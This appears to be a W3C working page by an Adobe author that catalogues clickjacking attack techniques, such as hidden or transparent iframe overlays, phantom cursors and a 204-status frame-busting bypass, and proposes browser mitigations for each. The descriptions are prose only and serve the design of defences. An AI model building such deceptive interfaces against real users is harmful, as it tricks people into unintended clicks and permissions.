Clickjacking Threats

Introduction

This page is intended to enumerate the known types of clickjacking attacks and possible mitigation strategies. Any W3C proposal for addressing clickjacking should consider each of these threats. The Possible solutions sections are currently just suggestions until they can be evaluated within the context of a formally proposed design. The main goal of possible solutions is to inspire ideas. Since clickjacking attacks are dependent on end-user comprehension of what they are viewing and the browser only controls the border of the window, a proposed spec may also need to specify guidelines for how web content should best integrate with the anti-clickjacking solution. Some of the proposed solutions contain information for what may be required of developers to properly integrate with the anti-clickjacking window (such as leveraging the X-Frame-Options header with their trusted content).

Content overlays

Description: The most common form of clickjacking attack involves obscuring a trusted dialogue by overlaying malicious content. There are several variants of this attack.

Completely hidden: The original clickjacking attack involved loading a victim piece of content into a 1x1 iframe which prevents the end-user from being able to visually see the victim content. The attacker then centers the 1x1 iframe under the cursor so that the end-user will click on it. Since the end-user cannot tell that there is 1x1 iframe under their mouse pointer, they can easily be tricked in clicking on the victim content.

Pointer events: In this attack, the attacker creates a floating div tag that will completely cover the target trusted UI dialogue. However, the attacker sets the CSS pointer-events property to 'none'. By doing this, clicks that occur in the region of untrusted overlay will be ignored by the floating div tag and passed through to the content positioned underneath the malicious floating div tag. In this case, the target trusted UI would be positioned underneath the malicious div tag and will receive the click events.

Cropping: In some cases, the attacker may only obscure part of the content through cropping. As an example, the attacker may leave the original 'allow' and 'cancel' buttons visible. However, the attacker would overlay a new question on the top of the original question. Therefore, the end-user believes that they are selecting between 'allow' and 'cancel' for the attacker's question. A slight variant of this attack may involve overlaying individual words in the trusted display rather than overlaying an entire section.

Transparent overlay: An attacker may try to make the trusted window transparent. The attacker will then overlay the trusted window on top of something that the user wants to click on. This causes the end-user to believe that they are clicking on the content that is positioned below the trusted window. In this case, the click would be registered by the transparent window since it is the top-most content at the time of the click.

Possible solutions:

For web content, developers can set the X-FRAME-OPTIONS header to prevent the iFrame attack
The browser should ensure that the content is the top most element on the display list.
The browser can attempt to perform screen scraping. For this solution, the web browser writes the UI to the screen and then queries the OS to ensure that the pixels on the screen match what was sent to the drawing API.
The browser should grey out the top most window and not just the window of the iframe when displaying an anti-clicking dialogue
The browser should not allow transparency to be applied when displaying the trusted window.

Known concerns: For the screen scraping approach, this solution may cause issues if the HTML and JS are within an operating within a browser sandbox. Sandboxes try to block untrusted content from performing screen scraping.

Scrolling attacks

Description: An attacker may try to hide part of a trusted dialogue by scrolling the page until the majority of the dialogue no longer appears on the screen. As an example, let's say the web page asks the end-user a question within a trusted UI panel. At the bottom of the panel, there are two buttons which say "OK" and "Cancel". The attacker could scroll the page down until only the "OK" and "Cancel" buttons are left visible on the screen. Then the attacker poses a different question to the left of the "OK" and "Cancel" buttons. This makes the end-user believe that the buttons are in response to the question that is positioned to the left.

This is different than an overlay attack in that the trusted UI is still completely visible from the point of view of the web page. The browser is rendering the trusted UI as the top-most element of the page and no other web content is trying to overlay it. However, the trusted UI is still not completely in view for the end-user because the web page has been scrolled down until only a portion of the trusted UI is left in the browser window.

Possible solutions:

The browser should ensure that the trusted UI is centered on the page. The browser may choose to grey out the rest of the content so that only the dialogue is clearly visible.
The browser can attempt to perform screen scraping. For this solution, the web browser writes the UI to the screen and then queries the OS to ensure that the pixels on the screen match what was sent to the drawing API.

Known concerns: For the content centering approach, the end-user may still be unable to tell which piece of content on the page is asking the question. For instance, if a child iframe requests the anti-clickjacking window then the end-user may assume the question is being asked for the parent domain.

For the screen scraping approach, this solution may cause issues if the HTML and JS are within an operating within a browser sandbox. Sandboxes try to block untrusted content from performing screen scraping.

Rapid content replacement

Description: As a variant of the "Content overlay" attack, an attacker may try to obscure the content all the way up until the user is about to click. When the attacker believes the end-user is about to click, the attacker rapidly removes the content that is obscuring the victim dialogue. Once the end-user clicks on the victim dialogue, the attacker re-applies the content overlay to obscure the dialogue. This entire process could be measured in milliseconds. As one example, the attacker may ask the user to perform a double-click. The first click would remove the malicious overlay and the second click would be sent to the trusted dialogue underneath. The goal of this attack would be to bypass the screen scraping protections by ensuring the dialogue is visible when the user performs the click. However, the dialogue is only visible long enough to capture the click and then it is hidden gain.

Possible solutions:

The browser should ensure that the dialogue is visible for a set period of time before recording the click. As an example, the dialogue must be visible for 3 seconds.
The browser should ensure that the dialogue is the top-most element on the display list.
The browser could ask for a secondary confirmation whose OK button is in a different position than the prior click.

Known concerns: The end-user may become frustrated during a legitimate use case when their first attempt at clicking is not recorded. The end-user may become equally frustrated regarding a second click. If the trusted UI window is small, the browser may not be able to place the secondary confirmation in a significantly different location.

Repositioning the trusted window

Description: An attacker may convince the end-user to rapidly click a button on the screen as part of a game. While the end-user is actively clicking on the button in the center of the screen, the attacker generates a trusted UI in the corner of the web page. As the user continues to click the button within the game, the attacker tries to rapidly slide the trusted UI under the user's mouse before the end-user can react. This results in the end-user unintentionally clicking on the trusted UI.

This attack is different from rapid content replacement. With rapid content replacement, the UI is only visible for a short period of time. In this attack, the UI is always visible but it's location on the page is changed in order to steal the click. Therefore, a protected UI must not only be visible for X number of seconds but its location must also be stationary for X number of seconds.

Possible solutions:

The dialogue must be present in a single position for a set period of time before clicks are registered. As an example, the dialogue should be stationary for 3 seconds.
Require a secondary confirmation whose location is in a different location than the last click.

Known concerns: The end-user may become frustrated during a legitimate use case if they have to click more than once due to the time delay. A secondary confirmation could be equally frustrating. If the trusted UI window is small, the browser may not be able to place the secondary confirmation in a significantly different location.

Phantom mouse cursors

'Description: It is possible for a web page to have multiple mouse cursors. The real mouse cursor always exists. An attacker can simulate an additional mouse cursor using the proper image in a floating div tag. This additional mouse cursor will always be at a fixed offset from the real mouse cursor. Therefore, the end-user will see the fake cursor moving in response to their mouse movements. The attacker will also set up the page such that their fake mouse cursor is more visually prominent. An end-user will then assume that the fake mouse cursor is the legitimate mouse cursor. The attacker can take advantage of this by placing something that the end-user will want to click on in one corner of the screen and the trusted dialogue in the other corner of the screen. These two items are placed such that they are the same distance apart as the real mouse cursor and the fake mouse cursor. If the end-user is confused into using the fake mouse cursor and attempts to click on the attacker's content with the fake cursor, then the real mouse cursor will be positioned in the other corner of the screen where the click will be sent to the trusted dialogue.

Even if the browser window greys out on time, it may take a second for the user to mentally register the change in focus. Therefore, they may click before they realize what has occured.

Possible solutions:

The browser should grey out all content in the window including the floating fake cursor when presenting the anti-clickjacking dialogue.
The browser should halt all actions on the parent web page until the interaction with the anti-clickjacking window is complete.
The browser can ensure that the dialogue is visible for 3 seconds before registering a click.
The content hosted by the trusted UI can randomize parts of its layout. This inhibits the attacker's ability to correctly guess the location of the trusted buttons.

Known concerns: The end-user may become frustrated during a legitimate use case if they have to click more than once due to the time delay.

Drag and drop attacks

'Description: Rather than trying to get the end-user to perform a click, an attacker may try to trick the end-user into performing a drag operation. For instance, an attacker may try to overlay the right edge of the trusted dialogue with what appears to be a scroll bar. When the end-user tries to scroll down on the fake scroll bar, they are actually initiating a drag action. That drag action could result in selected content from the trusted dialogue being dropped in the untrusted parent page where the hacker can retrieve it. In theory, a good content overlay protection should stop this attack. However, as a defense-in-depth measure the browser could prevent drag actions within a trusted anti-clickjacking dialogue.

Possible solutions:

Ensure that the content overlay protection protects the entire window including the boundaries.
Do not allow content from inside the trusted window to be dragged into the calling page.
Allow the developers to specify whether they want drag and drop protection in X-Frame-Options.

204 status codes / Malicious event handlers

Description: Many sites have deployed frame busting JavaScript code in order to prevent their content from being overlayed. One known bypass of this protection is to have the malicious parent iframe register an onunload event handler. When the event handler detects that the child iframe is trying to re-navigate the page, the event handler captures the redirect and instead loads a page that is returned with a 204 No Content HTTP status code. When the browser received the 204 status code, it decides to stop the re-navigation due to the lack of content. This leaves the malicious parent page loaded with the victim child iframe still in place.

For a clickjacking design that is initiated from JavaScript, an attacker is likely to have a handle to the anti-clickjacking window where they can listen for events or try to affect properties of the window. If the design allows the attacker to manipulate the window, then they may be able to alter its behavior. As an example, they may be able to alter the text of the dialogue that is being displayed.

Possible solutions:

The handle for the anti-clickjacking window should not expose any properties and the attacker should receive only a minimal set of events from the window.

Trusted dialogue extensions

Description: The trusted dialogue is likely to be a rectangular shape. Rather than overlay or obscure the content from view, an attacker may try to place an additional piece of malicious content to the right or bottom of the dialogue. The malicious content would have the same style as the trusted UI design. This will allow the malicious content to appear to be a seamless extension of the trusted dialogue. This could lead the end-user to believe that there is just one dialogue prompt on the screen. Depending on the malicious content, the attacker may be able to trick the end-user into misunderstanding the question being presented.

This is slightly different from the scrolling attack. In this scenario, the full UI is visible to the end-user at all times. In this case, the goal is to make the attacker's additions to the UI indistinguishable from the UI itself. This can allow the attacker to add additional text that may confuse the end-user.

Possible solutions:

All content that does not relate to the dialogue must be greyed out so that the dialogue is clearly distinguishable from untrusted content.
The browser could implement the anti-clickjacking dialogue to be a native dialogue rather than an extension of web content.

Known concerns: Native dialogues may convey more trust in the dialogue than the web browser intends to convey. While the anti-clickjacking dialogue should be clearly differentiated from all other content, it should not convey an additional level of trust. See 'Trusted user interfaces'.

Trusted user interfaces

Description: For Flash Player setting dialogues, the runtime uses primarily static text. The only per-site information that is displayed is the domain name that is requesting the permission. This ensures that the attacker cannot manipulate the question that is being presented to the end-user. A consistent UI experience can establish a sense of trust and is easier to describe to end-users.

Conversely, if the anti-clickjacking proposal intends to let sites define their own dialogues, then the web browser needs to be careful that the browser's anti-clickjacking UI does not appear to convey a false sense of trust. The UI should not lead the user to believe that the dialogue is more trustworthy than is intended. As an example, the trusted UI should not lead the user to believe it is the equivalent of an SSL connection if the parent content is served over HTTP.

Possible solutions:

The anti-clickjacking window should not convey any security related information such as a lock icon. The design should not require the end-user to know that this dialogue is special in any way.
The information that is presented in the dialogue should be loaded separately from the rest of the page. This will limit the effect an XSS attack may have on the information that is displayed in the trusted dialogue. As an example, the API for a new anti-clickjacking window can take a URL as an argument rather than a string of HTML content.
The browser should not allow anti-clickjacking protections in mixed-content scenarios. If the parent page is HTTP and the anti-clickjacking content comes from HTTPS, then the change in the UI may lead an end-user to believe that it is a secured connection. Developers may also mis-understand the protections of the anti-clickjacking dialogue and use it for one-click buys on insecure web pages. Ensuring that the location bar is HTTPS for trusted UI that is loaded over HTTPS could avoid these problems. This assumes that the anti-clickjacking API takes a URL as an argument rather than a string.

Known concerns: The browser will be unable to prevent the web site from providing a false sense of trust.

Authors

Peleus Uhley, Adobe Systems, Inc. with thanks to David Lin-Shung Huang from Carnegie Mellon University.